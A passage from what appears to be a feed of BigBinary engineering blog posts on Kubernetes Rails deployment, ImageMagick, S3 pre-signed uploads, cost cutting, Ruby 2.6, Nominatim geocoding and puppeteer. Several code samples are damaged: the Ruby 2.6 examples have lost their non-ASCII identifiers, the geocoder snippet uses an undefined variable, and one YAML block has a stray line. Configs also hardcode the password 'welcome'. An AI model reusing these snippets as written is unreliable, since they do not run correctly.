    app: db    spec:      containers:        - image: postgres:9.4          name: db          env:            - name: POSTGRES_USER              value: postgres            - name: POSTGRES_PASSWORD              value: welcome---apiVersion: v1kind: Servicemetadata:  labels:    app: db  name: dbspec:  ports:    - name: headless      port: 5432      targetPort: 5432  selector:    app: db</code></pre><p>Create Postgres DB and the service.</p><pre><code class="language-bash">$ kubectl create -f db-deployment.yml -f db-service.ymldeployment db createdservice db created</code></pre><p>Now that DB is available, we need to access it from the application using<code>database.yml</code>.</p><p>We will create configmap to store database credentials and mount it on the<code>config/database.yml</code> in our application deployments.</p><pre><code class="language-yaml">---apiVersion: v1kind: ConfigMapmetadata:  name: database-configdata:  database.yml: |    development:      adapter: postgresql      database: wheel_development      host: db      username: postgres      password: welcome      pool: 5    test:      adapter: postgresql      database: wheel_test      host: db      username: postgres      password: welcome      pool: 5    staging:      adapter: postgresql      database: postgres      host: db      username: postgres      password: welcome      pool: 5</code></pre><p>Create configmap for database.yml.</p><pre><code class="language-bash">$ kubectl create -f database-configmap.ymlconfigmap database-config created</code></pre><p>We have the database ready for our application, now let's proceed to deploy ourRails services.</p><h3>Deploying Rails micro-services using the same docker image</h3><p>In this blog, we will limit our services to web and background with kubernetesdeployment.</p><p>Let's create a deployment and service for our web application.</p><pre><code class="language-yaml">---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  name: wheel-web  labels:    app: wheel-webspec:  replicas: 1  template:    metadata:      labels:        app: wheel-web    spec:      containers:      - image: bigbinary/wheel:generic        name: web        imagePullPolicy: Always        env:        - name: DEPLOY_TIME          value: $date          value: staging        - name: POD_TYPE          value: WEB        ports:        - containerPort: 80        volumeMounts:          - name: database-config            mountPath: /wheel/config/database.yml            subPath: database.yml      volumes:        - name: database-config          configMap:            name: database-config---apiVersion: v1kind: Servicemetadata:  labels:    app: wheel-web  name: webspec:  ports:  - name: puma    port: 80    targetPort: 80  selector:    app: wheel-web  type: LoadBalancer</code></pre><p>Note that we used <code>POD_TYPE</code> as <code>WEB</code>, which will start the puma process fromthe container startup script.</p><p>Let's create a web/puma deployment and service.</p><pre><code class="language-bash">kubectl create -f web-deployment.yml -f web-service.ymldeployment wheel-web createdservice web created</code></pre><pre><code class="language-yaml">---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  name: wheel-background  labels:    app: wheel-backgroundspec:  replicas: 1  template:    metadata:      labels:        app: wheel-background    spec:      containers:        - image: bigbinary/wheel:generic          name: background          imagePullPolicy: Always          env:            - name: DEPLOY_TIME              value: $date            - name: POD_TYPE              value: background          ports:            - containerPort: 80          volumeMounts:            - name: database-config              mountPath: /wheel/config/database.yml              subPath: database.yml      volumes:        - name: database-config          configMap:            name: database-config---apiVersion: v1kind: Servicemetadata:  labels:    app: wheel-background  name: backgroundspec:  ports:    - name: background      port: 80      targetPort: 80  selector:    app: wheel-background</code></pre><p>For background/delayed-job we set <code>POD_TYPE</code> as <code>background</code>. It will startdelayed-job process.</p><p>Let's create background deployment and the service.</p><pre><code class="language-bash">kubectl create -f background-deployment.yml -f background-service.ymldeployment wheel-background createdservice background created</code></pre><p>Get application endpoint.</p><pre><code class="language-bash">$ kubectl get svc web -o wide | awk '{print $4}'a55714dd1a22d11e88d4b0a87a399dcf-2144329260.us-east-1.elb.amazonaws.com</code></pre><p>We can access the application using the endpoint.</p><p>Now let's see pods.</p><pre><code class="language-bash">$ kubectl get podsNAME                                READY     STATUS    RESTARTS   AGEdb-5f7d5c96f7-x9fll                 1/1       Running   0          1hwheel-background-6c7cbb4c75-sd9sd   1/1       Running   0          30mwheel-web-f5cbf47bd-7hzp8           1/1       Running   0          10m</code></pre><p>We see that <code>db</code> pod is running postgres, <code>wheel-web</code> pod is running puma and<code>wheel-background</code> pod is running delayed job.</p><p>If we check logs, everything coming to puma is handled by web pod. All thebackground jobs are handled by background pod.</p><p>Similarly, if we are using websocket, separate API pods, traffic will be routedto respective services.</p><p>This is how we can deploy Rails micro services using parametrized containers anda generic image.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring memory allocation in ImageMagick]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/configuring-memory-allocation-in-imagemagick"/>
      <updated>2018-09-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/configuring-memory-allocation-in-imagemagick</id>
      <content type="html"><![CDATA[<p>ImageMagick has a security policy file<a href="https://www.imagemagick.org/source/policy.xml">policy.xml</a> using which we cancontrol and limit the execution of the program. For example, the default memorylimit of ImageMagick-6 is 256 MiB.</p><p>Recently, we saw following error while processing a gif image.</p><pre><code class="language-text">convert-im6.q16: DistributedPixelCache '127.0.0.1' @ error/distribute-cache.c/ConnectPixelCacheServer/244.convert-im6.q16: cache resources exhausted `file.gif' @ error/cache.c/OpenPixelCache/3945.</code></pre><p>This happens when ImageMagick cannot allocate enough memory to process theimage. This can be fixed by tweaking memory configuration in <code>policy.xml</code>.</p><p>Path of <code>policy.xml</code> can be located as follows.</p><pre><code class="language-text">$ identify -list policyPath: /etc/ImageMagick-6/policy.xml  Policy: Resource    name: disk    value: 1GiB</code></pre><p>Memory limit can be configured in the following line of <code>policy.xml</code>.</p><pre><code class="language-xml">&lt;policy domain=&quot;resource&quot; name=&quot;memory&quot; value=&quot;256MiB&quot;/&gt;</code></pre><p>Increasing this value would solve the error if you have a machine with larger amemory.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Upload direct to S3 with Pre-signed POST request]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/uploading-files-directly-to-s3-using-pre-signed-post-request"/>
      <updated>2018-09-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/uploading-files-directly-to-s3-using-pre-signed-post-request</id>
      <content type="html"><![CDATA[<p>It's easyto create a form in Railswhich can upload a fileto the backend.The backend,can then take the fileand upload it to S3.We can do that by using gems like<a href="https://github.com/thoughtbot/paperclip">paperclip</a>or<a href="https://github.com/carrierwaveuploader/carrierwave">carrierwave</a>.Or if we are using Rails 5.2,we can use<a href="https://github.com/rails/rails/tree/master/activestorage">Active Storage</a></p><p>But for applications,where Rails is usedonly as an API backend,uploading via a formis not an option.In this case,we can expose an endpointwhich accepts files,and then Railscan handle uploading to S3.</p><p>In most of the cases,the above solution works.But recently,in one of our applicationswhich is hosted at<a href="https://www.heroku.com/">Heroku</a>we faced time-out related problemswhile uploading large files.Here is what heroku's<a href="https://devcenter.heroku.com/articles/request-timeout">docs</a>says about how long a request can take.</p><blockquote><p>The router terminates the requestif it takes longer than30 seconds to complete.</p></blockquote><h2>Pre-signed POST request</h2><p>An obvious solutionis to upload the filesdirectly to S3.However in order to do that,the client needsAWS credentials,which is not ideal.If the client is aSingle Page Application,the AWS credentialswould be visiblein the javascript files.Or if the client is a mobile app,someone might be able toreverse engineer the application,and get holdof the AWS credentials.</p><p>Here's wherePre-signed POST requestcomes to the rescue.Here is<a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/PresignedUrlUploadObject.html">official docs</a>from AWS on this topic.</p><p>Uploading via Pre-signed POSTis a two step process.The clientfirst requests a permissionto upload the file.The backendreceives the request,generates the pre-signed URLand returns the responsealong with other fields.The clientcan then upload the fileto the URL receivedin the response.</p><h2>Implementation</h2><p>Add the AWS gem to you Gemfile and <code>run bundle install</code>.</p><pre><code class="language-ruby">gem 'aws-sdk'</code></pre><p>Create a S3 bucketwith the AWS credentials.</p><pre><code class="language-ruby">aws_credentials = Aws::Credentials.new(  ENV['AWS_ACCESS_KEY_ID'],  ENV['AWS_SECRET_ACCESS_KEY'])s3_bucket = Aws::S3::Resource.new(  region: 'us-east-1',  credentials: aws_credentials).bucket(ENV['S3_BUCKET'])</code></pre><p>The controllerhandling the requestfor getting the presigned URLshould havefollowing code.</p><pre><code class="language-ruby">def request_for_presigned_url  presigned_url = s3_bucket.presigned_post(    key: &quot;#{Rails.env}/#{SecureRandom.uuid}/${filename}&quot;,    success_action_status: '201',    signature_expiration: (Time.now.utc + 15.minutes)  )  data = { url: presigned_url.url, url_fields: presigned_url.fields }  render json: data, status: :okend</code></pre><p>In the above code,we are creating a presigned urlusing the <code>presigned_post</code> method.</p><p>The <strong>key</strong> optionspecifies pathwhere the file would be stored.AWS supportsa custom ${filename} directivefor the key option.This ${filename} directivetells S3 thatif a user uploads a filenamed <code>image.jpg</code>,then S3 should store the filewith the same name.In S3,we cannot have duplicate keys,so we are using <code>SecureRandom</code>to generate unique keyso that 2 files with same name can be stored.</p><p>If a file is successfully uploaded, then clientreceives HTTP status code under key <code>success_action_status</code>.If the client sets its valueto <code>200</code> or <code>204</code> in the request,Amazon S3 returns an empty documentalong with <code>200</code> or <code>204</code> as HTTP status code.We set it to <code>201</code> herebecause we want the clientto notify us with the<a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/Introduction.html#BasicsKeys">S3 key</a>where the filewas uploaded to.The S3 key is presentin the XML documentwhich is received as a responsefrom AWSonly when the status code is <code>201</code>.</p><p>signature_expirationspecifies when the signatureon the POST will expire.It defaults to one hourfrom the creation of the presigned POST.This valueshould not exceed one weekfrom the creation time.Here,we are setting it to15 minutes.</p><p>Other configuration optionscan be found<a href="https://docs.aws.amazon.com/sdkforruby/api/Aws/S3/Bucket.html#presigned_post-instance_method">here</a>.</p><p>In response to the above request,we send out a JSON whichcontains the URLand the fields required formaking the upload.</p><p>Here's a sample response.</p><pre><code class="language-json">{  &quot;url&quot;: &quot;https://s3.amazonaws.com/&lt;some-s3-url&gt;&quot;,  &quot;url_fields&quot;: {    &quot;key&quot;: &quot;development/8614bd40-691b-4668-9241-3b342c6cf429/${filename}&quot;,    &quot;success_action_status&quot;: &quot;201&quot;,    &quot;policy&quot;: &quot;&lt;s3-policy&gt;&quot;,    &quot;x-amz-credential&quot;: &quot;********************/20180721/us-east-1/s3/aws4_request&quot;,    &quot;x-amz-algorithm&quot;: &quot;AWS4-HMAC-SHA256&quot;,    &quot;x-amz-date&quot;: &quot;201807021T144741Z&quot;,    &quot;x-amz-signature&quot;: &quot;&lt;hexadecimal-signature&gt;&quot;  }}</code></pre><p>Once the clientgets the above credentials,it can proceedwith the actual file upload.</p><p>The client can be anything.An iOS app, android app,an SPA or even a Rails app.For our example,let's assume it's a node client.</p><pre><code class="language-javascript">var request = require(&quot;request&quot;);function uploadFileToS3(response) {  var options = {    method: 'POST',    url: response.url,    formData: {      ...response.url_fields,      file: &lt;file-object-for-upload&gt;    }  }  request(options, (error, response, body) =&gt; {    if (error) throw new Error(error);    console.log(body);  });}</code></pre><p>Here,we are making a POST requestto the URL receivedfrom the earlier presigned response.Note that we are using the<a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Spread_syntax">spread operator</a>to pass <code>url_fields</code> in formData.</p><p>When the POST request is successful,the client then receives an XMLresponse from S3because we set the response code to be 201.A sample response can be like the following.</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;PostResponse&gt;    &lt;Location&gt;https://s3.amazonaws.com/link-to-the-file&lt;/Location&gt;    &lt;Bucket&gt;s3-bucket&lt;/Bucket&gt;    &lt;Key&gt;development/8614bd40-691b-4668-9241-3b342c6cf429/image.jpg&lt;/Key&gt;    &lt;ETag&gt;&quot;32-bit-tag&quot;&lt;/ETag&gt;&lt;/PostResponse&gt;</code></pre><p>Using the above response,the clientcan then let the API knowabout where the file was uploadedby sending the value from the <code>Key</code> node.Although,this can be optional in some cases,depending on the API,if it actually needs this info.</p><h2>Advantages</h2><p>Using AWS S3 presigned-urls has a few advantages.</p><ul><li><p>The main advantageof uploading directly to S3is that there would beconsiderably less loadon your application serversince the serveris now free from handling thereceiving of files and transferring to S3.</p></li><li><p>Since the file uploadhappens directly on S3,we can bypassthe 30 seconds Heroku time limit.</p></li><li><p>AWS credentialsare not sharedwith the client application.So no one would be able toget their hands on your AWS keys.</p></li><li><p>The generated presigned-urlcan be initializedwith an expiration time.So the URLsand the signatures generatedwould be invalid after that time period.</p></li><li><p>The clientdoes not need to installany of the AWS libraries.It just needs to upload the filevia a simple POST requestto the generated URL.</p></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Reducing infrastructure cost by 10% for ECommerce app]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-reduced-infrastructure-cost-e-commerce-project"/>
      <updated>2018-08-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-reduced-infrastructure-cost-e-commerce-project</id>
      <content type="html"><![CDATA[<p>Recently, we got an opportunity to reduce the infrastructure cost of amedium-sized e-commerce project. In this blog we discuss how we reduced thetotal infrastructure cost by 10%.</p><h3>Changes to MongoDB instances</h3><p>Depending on the requirements, modern web applications use different third-partyservices. For example, it's easy and cost effective to subscribe to a GeoIPlookup service than building and maintaining one. Some third-party services getvery expensive as the usage increases but people don't look for alternatives dueto legacy reasons.</p><p>In our case, our client had been paying more than $5,000/month for athird-party MongoDB service. This service charges based on the storage used andwe had years of data in it. This data is consumed by a machine learning systemto fight fraudulent purchases and users. We had a look at both the ML system andthe data in MongoDB and found we actually didn't need all the data in thedatabase. The system never read data older than 30-60 days in some of thebiggest mongo collections.</p><p>Since we were already using <a href="https://www.nomadproject.io/">nomad</a> as ourscheduler, we wrote a periodic nomad job that runs every week to deleteunnecessary data. The nomad job syncs both primary and secondary MongoDBinstances to release the free space back to OS. This helped reduce monthly billto $630/month.</p><h2>Changes to MongoDB service provider</h2><p>Then we looked at the MongoDB service provider. It was configured years backwhen the application was built. There are other vendors who provided the sameservice for a much cheaper price. We switched our MongoDB to mLab and now thedatabase runs in a $180/month dedicated cluster. With WiredTiger's<a href="https://docs.mongodb.com/manual/core/wiredtiger/#compression">compression</a>enabled, we don't use as much storage we used to use before.</p><h2>Making use of Auto Scaling</h2><p>Auto Scaling can be a powerful tool when it comes to reducing costs. We had beenrunning around 15 large EC2 instances. This was inefficient due to following tworeasons.</p><ol><li>It cannot cope up when the traffic increases beyond its limit.</li><li>Resources are underused when traffic is less.</li></ol><p>Auto Scaling solves both the issues. For web servers, we switched to smallerinstances and used<a href="https://docs.aws.amazon.com/autoscaling/ec2/userguide/as-scaling-target-tracking.html">Target Tracking Scaling Policy</a>to keep the average aggregate CPU utilization at 70%.</p><p>Background job workers made use of a nomad job we built. It periodicallycalculated the number of required instances based on the count of pending jobsand the job's queue priority. This number was pushed to CloudWatch as a metricand the Auto Scaling group scaled based on that. This approach was effective inboosting performance and reducing cost.</p><h2>Buying reserved instances</h2><p>AWS has a feature to reserve instances for services like EC2, RDS, etc.. It'soften preferable to buy reserved instances than running the application usingon-demand instances. We evaluated reserved instance utilization using the<a href="https://console.aws.amazon.com/cost-reports/home?#/ri/utilization">reporting tool</a>and bought the required reserved instances.</p><h2>Looking for cost-effective solutions</h2><p>Sometimes, different solutions to the same problem can have different costs. Forexample, we had been facing small DDoS attack regularly and we had to rate-limitrequests based on IP and other parameters. Since we had been using Cloudflare,we could have used their rate-limiting feature. Performance wise, it was thebest solution but they charge based on the number of good requests. It would beexpensive for us since it's a high-traffic application. We looked for othersolutions and solved the problem using Rack::Attack. We<a href="https://blog.bigbinary.com/2018/05/15/how-to-mitigate-ddos-using-rack-attack.html">wrote a blog</a>about it sometime back. The solution presented in the blog was effective inmitigating the DDoS attack we faced and didn't cost us anything significant.</p><h2>Requesting custom pricing</h2><p>If you are a comparatively larger customer of a third-party service, it's morelikely that you don't have to pay the published price. Instead, we could requestfor custom pricing. Many companies will be happy to give 20% to 50% pricediscounts if we can commit to a minimum spending in the year. We triednegotiating a new contract for an expensive third-party service and got the dealwith 40% discount compared to their published minimum price.</p><p>Running an infrastructure can be both technically and economically challenging.But if we can look between the lines and if we are willing to update existingsystems, we would be amazed in terms of how much money we can save every month.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds Enumerable#filter as alias of Enumerable#select]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-enumerable-filter-as-an-alias-of-enumerable-select"/>
      <updated>2018-08-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-enumerable-filter-as-an-alias-of-enumerable-select</id>
      <content type="html"><![CDATA[<p>Ruby 2.6 has added <code>Enumerable#filter</code> as an alias of <code>Enumerable#select</code>. Thereason for adding <code>Enumerable#filter</code> as an alias is to make it easier forpeople coming from other languages to use Ruby. A lot of other languages,including Java, R, PHP etc., have a filter method to filter/select records basedon a condition.</p><p>Let's take an example in which we have to select/filter all numbers which aredivisible by 5 from a range.</p><h4>Ruby 2.5</h4><pre><code class="language-ruby">irb&gt; (1..100).select { |num| num % 5 == 0 }=&gt; [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]irb&gt; (1..100).filter { |num| num % 5 == 0 }=&gt; Traceback (most recent call last):2: from /Users/amit/.rvm/rubies/ruby-2.5.1/bin/irb:11:in `&lt;main&gt;' 1: from (irb):2 NoMethodError (undefined method`filter' for 1..100:Range)</code></pre><h4>Ruby 2.6.0-preview2</h4><pre><code class="language-ruby">irb&gt; (1..100).select { |num| num % 5 == 0 }=&gt; [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]irb&gt; (1..100).filter { |num| num % 5 == 0 }=&gt; [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100]</code></pre><p>Also note, along with <code>Enumerable#filter</code>, <code>Enumerable#filter!</code>,<code>Enumerable#select!</code> was also added as an alias.</p><p>Here is the relevant <a href="https://github.com/ruby/ruby/commit/b1a8c64483">commit</a>and <a href="https://bugs.ruby-lang.org/issues/13784">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds support for non-ASCII capital letter]]></title>
       <author><name>Rohan Pujari</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2.6-adds-support-for-non-ascii-capital-case-constant"/>
      <updated>2018-08-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2.6-adds-support-for-non-ascii-capital-case-constant</id>
      <content type="html"><![CDATA[<p>Before Ruby 2.6, constant must have a capital ASCII letter as the firstcharacter. It means class and module name cannot start with non-ASCII capitalcharacter.</p><p>Below code will raise <code>class/module name must be CONSTANT</code> exception.</p><pre><code class="language-ruby">  class   end</code></pre><p>We can use above non-ASCII character as a method name or variable name though.</p><p>Below code will run without any exception</p><pre><code class="language-ruby">  class NonAsciiMethodAndVariable    def        = &quot;BigBinary&quot;    end  end</code></pre><p>&quot;&quot; is treated as a variable name in above example, even though firstletter() is a capital non-ASCII character.</p><h4>Ruby 2.6</h4><p>Ruby 2.6 relaxes above mentioned limitation. We can now define constants inlanguages other than English. Languages having capital letters like Russian andGreek can be used to define constant name.</p><p>Below code will run without exception in any Ruby 2.6.</p><pre><code class="language-ruby">  class   end</code></pre><p>As capital non-Ascii characters are now treated as constant, below code willraise a warning in Ruby 2.6.</p><pre><code class="language-ruby">  irb(main):001:0&gt;  = &quot;BigBinary&quot;  =&gt; &quot;BigBinary&quot;  irb(main):002:0&gt;  = &quot;BigBinary&quot;  (irb):2: warning: already initialized constant   (irb):1: warning: previous definition of  was here</code></pre><p>Above code will run without any warnings on Ruby versions prior to 2.6</p><p>Here is relevant <a href="https://github.com/ruby/ruby/commit/f852af">commit</a> and<a href="https://bugs.ruby-lang.org/issues/13770">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Setting up a high performance Geocoder]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/setting-up-a-high-performance-geocoder"/>
      <updated>2018-08-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/setting-up-a-high-performance-geocoder</id>
      <content type="html"><![CDATA[<p>One of our applications uses geocoding extensively. When we started the project,we included the excellent<a href="https://github.com/alexreisner/geocoder">Geocoder gem</a>, and set<a href="https://developers.google.com/maps/documentation/geocoding/start">Google</a> asthe geocoding backend. As the application scaled, its geocoding requirementsgrew and soon we were looking at geocoding bills worth thousands of dollars.</p><h3>An alternative Geocoder</h3><p>Our search for an alternative geocoder landed us on Nominatim. Written in C,with a PHP web interface, Nominatim was performant enough for our requirements.Once set up, Nominatim required 8GB of RAM to run and this included RAM for thePostgreSQL (+ PostGIS) as well.</p><p>The rest of the blog discusses how to setup Nominatim and the tips and tricksthat we learned along the way and how it compares with the geocoding solutionoffered by Google.</p><h3>Setting up Nominatim</h3><p>We started off by looking for Amazon Machine Images with Nominatim setup andcould only find one which was hosted by<a href="https://www.openstreetmap.org/">OpenStreetMap</a> but the magnet link was dead.</p><p>Next, we went through the<a href="http://nominatim.org/release-docs/latest/admin/Installation/">official installation document</a>.We decided to give docker a shot and found that there are many Nominatim dockerbuilds. We used<a href="https://github.com/merlinnot/nominatim-docker">https://github.com/merlinnot/nominatim-docker</a>since it seemed to follow all the steps mentioned in the official installationguide.</p><h2>Issues faced during Setup</h2><h4>Out of Memory Errors</h4><p>The official documentation recommends using 32GB of RAM for initial import butwe needed to double the memory to 64GB to make it work.</p><p>Also any time docker build failed, due to the large amount of data that isgenerated on each run, we also ran out of disk space on subsequent docker buildssince docker caches layers across builds.</p><h4>Merging Multiple Regions</h4><p>We wanted to geocode locations from USA, Mexico, Canada and Sri Lanka. USA,Mexico and Canada are<a href="http://download.geofabrik.de/north-america.html#subregions">included by default in North America data extract</a>but we had to merge data for Sri Lanka with North America to get it in a formatrequired for initial import.</p><p>The following snippet pre-processes map data for North America and Sri Lankainto a single data.osm.pbf file that can be directly used by Nominatiminstaller.</p><pre><code class="language-bash">RUN curl -L 'http://download.geofabrik.de/north-america-latest.osm.pbf' \    --create-dirs -o /srv/nominatim/src/north-america-latest.osm.pbfRUN curl -L 'http://download.geofabrik.de/asia/sri-lanka-latest.osm.pbf' \    --create-dirs -o /srv/nominatim/src/sri-lanka-latest.osm.pbfRUN osmconvert /srv/nominatim/src/north-america-latest.osm.pbf \    -o=/srv/nominatim/src/north-america-latest.o5mRUN osmconvert /srv/nominatim/src/sri-lanka-latest.osm.pbf \    -o=/srv/nominatim/src/sri-lanka-latest.o5mRUN osmconvert /srv/nominatim/src/north-america-latest.o5m \    /srv/nominatim/src/sri-lanka-latest.o5m \    -o=/srv/nominatim/src/data.o5mRUN osmconvert /srv/nominatim/src/data.o5m \    -o=/srv/nominatim/src/data.osm.pbf</code></pre><h4>Slow Search times</h4><p>Once the installation was done, we tried running simple location<a href="https://nominatim.openstreetmap.org/search.php?q=New+York&amp;polygon_geojson=1&amp;viewbox=">searches like this one</a>,but the search timed out. Usually Nominatim can provide a lot of informationfrom its web-interface by appending <code>&amp;debug=true</code> to the search query.</p><pre><code class="language-bash"># fromhttps://nominatim.openstreetmap.org/search.php?q=New+York&amp;polygon_geojson=1&amp;viewbox=# tohttps://nominatim.openstreetmap.org/search.php?q=New+York&amp;polygon_geojson=1&amp;viewbox=&amp;debug=true</code></pre><p>We created an<a href="https://github.com/openstreetmap/Nominatim/issues/1023">issue in Nominatim repository</a>and got very prompt replies from Nominatim maintainers, especially from<a href="https://github.com/lonvia">Sarah Hoffman</a> .</p><pre><code class="language-sql"># runs analyze on the entire nominatim databasepsql -d nominatim -c 'ANALYZE VERBOSE'</code></pre><p>PostgreSQL query planner<a href="https://www.postgresql.org/docs/9.5/static/planner-stats.html">depends on statistics</a>collected by<a href="https://www.postgresql.org/docs/9.1/static/monitoring-stats.html">postgres statistics collector</a>while executing a query. In our case, query planner took an enormous amount oftime to plan queries as there were no stats collected since we had a freshinstallation.</p><h3>Comparing Nominatim and Google Geocoder</h3><p>We compared 2500 addresses and we found that Google geocoded 99% of thoseaddresses. In comparison Nominatim could only geocode 47% of the addresses.</p><p>It means we still need to geocode ~50% of addresses using Google geocoder. Wefound that we could increase geocoding efficiency by normalizing the addresseswe had.</p><h3>Address Normalization using libpostal</h3><p><a href="https://github.com/openvenues/libpostal">Libpostal</a> is an address normalizer,which uses<a href="https://en.wikipedia.org/wiki/Natural-language_processing#Statistical_natural-language_processing_(SNLP)">statistical natural-language processing</a>to normalize addresses. Libpostal also has<a href="https://github.com/openvenues/ruby_postal">ruby bindings</a> which made it quiteeasy to use it for our test purposes.</p><p>Once libpostal and its ruby-bindings were installed (installation isstraightforward and steps are available in<a href="https://github.com/openvenues/ruby_postal">ruby-postal's github page</a>), we gavelibpostal + Nominatim a go.</p><pre><code class="language-ruby">require 'geocoder'require 'ruby_postal/expand'require 'ruby_postal/parser'Geocoder.configure({lookup: :nominatim, nominatim: { host: &quot;nominatim_host:port&quot;}})full_address = [... address for normalization ...]expanded_addresses = Postal::Expand.expand_address(full_address)parsed_addresses = expanded_addresses.map do |address|  Postal::Parser.parse_address(address)endparsed_addresses.each do | address |  parsed_address = [:house_number, :road, :city, :state, :postcode, :country].inject([]) do |acc, key|    # address is of format    # [{label: 'postcode', value: 12345}, {label: 'city', value: 'NY'} .. ]    key_value = address.detect { |address| address[:label] == key }    if key_value        acc &lt;&lt; &quot;#{key_value_pair[:value]}&quot;.titleize    end    acc  end  coordinates = Geocoder.coordinates(parsed_address.join(&quot;, &quot;))  if (coordinates.is_a? Array) &amp;&amp; coordinates.present?    puts &quot;By Libpostal #{coordinates} =&gt; #{parsed_address.join(&quot;, &quot;)}&quot;    break  endend</code></pre><p>With this, we were able to improve our geocoding efficiency by 10% asNominatim + Libpostal combination could geocode ~ 59% of addresses.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debug failing puppeteer tests due to background tab]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-failing-tests-in-background-tab-in-puppeteer"/>
      <updated>2018-08-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-failing-tests-in-background-tab-in-puppeteer</id>
      <content type="html"><![CDATA[<p>We have been using puppeteer in one of our projects to write end-to-end tests.We run our tests in headful mode to see the browser in action.</p><p>If we start puppeteer tests and do nothing in our laptop (just watch the testsbeing executed) then all the tests will pass.</p><p>However if we are doing our regular work in our laptop while tests are runningthen tests would fail randomly. This was quite puzzling.</p><p>Debugging such flaky tests is hard. We first suspected that the test casesthemselves needed more of implicit waits for element/text to be present/visibleon the DOM.</p><p>After some debugging using puppeteer protocol logs, it seemed like the browserwas performing certain actions very slowly or was waiting for the browser to beactive ( in view ) before performing those actions.</p><p>Chrome starting with version 57 introduced<a href="https://developers.google.com/web/updates/2017/03/background_tabs">throttling of background tabs</a>for improving performance and battery life. We execute one test per browsermeaning we didn't make use of multiple tabs. Also tests failed only when theuser was performing some other activities while the tests were executing inother background windows.<a href="https://developer.mozilla.org/en-US/docs/Web/API/Page_Visibility_API">Pages were hidden</a>only when user switched tabs or minimized the browser window containing the tab.</p><p>After observing closely we noticed that the pages were making requests to theserver. The issue was the page was not painting if the page is not in view. Weadded flag <code>--disable-background-timer-throttling</code> but we did not notice anydifference.</p><p>After doing some searches we noticed the flag <code>--disable-renderer-backgrounding</code>was being used in<a href="https://github.com/karma-runner/karma-chrome-launcher/blob/01c7efc870e64733d81347d4996fb9bcbf099825/index.js#L42-L46">karma-launcher</a>.The comment states that it is specifically required on macOS. Here is the<a href="https://cs.chromium.org/chromium/src/content/browser/renderer_host/render_widget_host_impl.cc?l=684-689">code</a>responsible for lowering the priority of the renderer when it is hidden.</p><p>But the new flag didn't help either.</p><p>While looking at all the available command line switches for chromium, westumbled upon <code>--disable-backgrounding-occluded-windows</code>. Chromium alsobackgrounds the renderer while the window is not visible to the user. It seemsfrom the comment that the flag<a href="https://cs.chromium.org/chromium/src/content/public/common/content_switches.cc?l=99-102">kDisableBackgroundingOccludedWindowsForTesting</a>is specifically added to avoid non-deterministic behavior during tests.</p><p>We have added following flags to chromium for running our integration suite andthis solved our problem.</p><pre><code class="language-js">const chromeArgs = [  &quot;--disable-background-timer-throttling&quot;,  &quot;--disable-backgrounding-occluded-windows&quot;,  &quot;--disable-renderer-backgrounding&quot;,];</code></pre><p>References</p><ul><li><a href="https://docs.google.com/document/d/18_sX-KGRaHcV3xe5Xk_l6NNwXoxm-23IOepgMx4OlE4/pub">Background tabs &amp; offscreen frames </a></li><li><a href="https://www.chromium.org/developers/design-documents/mac-occlusion">Mac Window Occlusion API Use</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Kubernetes ingress controller for authenticating apps]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/using-kubernetes-ingress-authentication"/>
      <updated>2018-08-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-kubernetes-ingress-authentication</id>
      <content type="html"><![CDATA[<p><a href="https://kubernetes.io/docs/concepts/services-networking/ingress/">Kubernetes Ingress</a>has redefined the routing in this era of containerization and with all thesefreehand routing techniques the thought of &quot;My router my rules&quot; seems real.</p><p>We use nginx-ingress as a routing service for our applications. There is a lotmore than routing we can do with ingress. One of the important features issetting up authentication using ingress for our application. As all the trafficgoes from ingress to our service, it makes sense to setup authentication oningress.</p><p>As mentioned in<a href="https://github.com/kubernetes/ingress-nginx/tree/master/docs/examples/">ingress repository</a>there are different types of techniques available for authentication including:</p><ul><li>Basic authentication</li><li>Client-certs authentication</li><li>External authentication</li><li>Oauth external authentication</li></ul><p>In this blog, we will set up authentication for the sample application usingbasic ingress authentication technique.</p><h4>Pre-requisites</h4><ul><li><p>Access to working kubernetes cluster.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,<a 